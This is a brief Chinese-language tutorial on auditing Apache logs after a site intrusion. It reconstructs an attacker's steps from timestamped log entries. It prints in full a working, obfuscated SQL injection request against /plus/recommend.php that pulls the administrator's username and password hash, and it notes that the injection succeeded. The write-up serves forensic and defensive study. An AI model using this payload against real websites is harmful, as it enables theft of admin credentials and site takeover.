【日志审计】Apache日志分析

前言

在网站被入侵以后我们可以通过分析日志来得出攻击者是如何入侵网站的，然后按照攻击者的入侵路线来对网站进行修复和清理入侵者留的后门。日志分析是我们进行网站维护的重要技能，下面我们就以Apache日志为例分析一下攻击者是如何入侵网站的

通过分析Apache日志了解到了攻击者在入侵网站时的主要步骤
攻击者在27/May/2019:15:46:42利用payload注出后台登录账号密码

账号密码POC:

/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294

成功注出管理员账号密码

攻击者在27/May/2019:15:50:07利用扫描工具开始扫描